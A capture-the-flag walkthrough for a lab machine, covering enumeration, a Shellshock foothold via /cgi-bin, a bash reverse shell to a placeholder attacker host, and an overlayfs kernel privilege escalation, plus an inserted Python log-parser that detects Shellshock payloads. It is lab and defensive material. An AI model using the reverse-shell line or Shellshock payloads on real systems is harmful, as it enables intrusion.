Nmap
Starting off with an Nmap scan:
nmap -sC -sV -vv <MACHINE-IP>
We get 2 open ports:-
- 22 - ssh
- 80 - http
Getting the user flag
First look at the website does not show anything interesting, neither on the webpage nor in the source code.
Checking the robots.txt file also yields nothing.
So it's time to enumerate the website using both ffuf and dirb.
ffuf leads us to two interesting pages:-
- /backup which contains an ssh key
- /secret which again has nothing interesting
On the other hand, dirb shows us /cgi-bin.
Taken together with the hints on the machine page and the turtle references, the /cgi-bin directory made me think of the Shellshock exploit.
To use Shellshock, I found this GitHub repository which has an exploit written in Python.
After gaining initial access, we can upgrade to a proper reverse shell using the bash one-liner from pentestmonkey and netcat.
On your attack machine, run:-
nc -lvnp <PORT>
On the target machine, run:-
/bin/bash -i >& /dev/tcp/ATTACKER-IP/PORT 0>&1
This gives us a more stable shell as www-data, and fortunately we can read the user flag in /home/ryan.
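The foothold above works because Apache's CGI handler exports request headers (User-Agent, Referer) into the environment of whatever runs under /cgi-bin, which is exactly what Shellshock abuses. From the defender's side, the same fact makes attempts easy to spot in the access log. The following is an added example, not part of the original walkthrough: it parses constructed Apache combined-format log lines and flags requests carrying a bash function definition marker, rating hits against /cgi-bin/ as high.

```python
import re
from urllib.parse import unquote

# Apache "combined" log format; the sample lines below are constructed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+)[^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Shellshock needs an environment variable whose value starts with a bash
# function definition, "() {", followed by a body. Only the marker is matched.
FUNC_DEF_RE = re.compile(r'\(\)\s*\{')

SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:12:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [10/Oct/2023:12:00:02 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 0 "-" "() { :;}; echo test"
10.0.0.7 - - [10/Oct/2023:12:00:03 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 0 "() { :;}; echo test" "curl/7.0"
10.0.0.9 - - [10/Oct/2023:12:00:04 +0000] "GET /secret/ HTTP/1.1" 404 0 "-" "() { :;}; echo test"
"""

def parse_line(line):
    m = LOG_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None

def find_shellshock_attempts(log_text):
    """One finding per request whose User-Agent, Referer or path carries the
    function-definition marker. Requests under /cgi-bin/ are rated high since
    that is where Apache hands the environment to a script; elsewhere the
    marker is still worth an alert but rated low."""
    findings = []
    for line in log_text.splitlines():
        e = parse_line(line)
        if not e:
            continue
        fields = [f for f in ("ua", "referer", "path")
                  if FUNC_DEF_RE.search(unquote(e[f]))]
        if fields:
            findings.append({
                "ip": e["ip"],
                "path": e["path"],
                "fields": fields,
                "severity": "high" if e["path"].startswith("/cgi-bin/") else "low",
            })
    return findings

if __name__ == "__main__":
    for f in find_shellshock_attempts(SAMPLE_LOG):
        print(f)
```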
Getting the root flag
In order to discover the privilege escalation vector, you can either take the manual route or the automated route.
The automated way is to set up a Python http server on your attack machine:-
python3 -m http.server <PORT>
And then use wget on the target machine to fetch LinPEAS from it.
Before running LinPEAS, ensure it can be executed:-
chmod 777 linpeas.sh
And then run it:-
./linpeas.sh
In its output, LinPEAS suggests a few exploits for us which target older kernel versions.
The manual way of discovering this would be to check the kernel version with uname:-
www-data@ubuntu:/tmp$ uname -a
uname -a
Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux
And look for an exploit online.
So, after settling on one of the possible exploits (I used the overlayfs exploit), you need to save it on your attack machine, and again use a Python http server and wget to transfer it to the target.
After that, we get an error trying to compile the C file because the compiler cannot be found with the $PATH our shell currently has, but that is easily solved by running:-
export PATH=/usr/sbin:/usr/bin:/sbin:/bin
After the C file is compiled, we run the resulting binary and voila, we are root!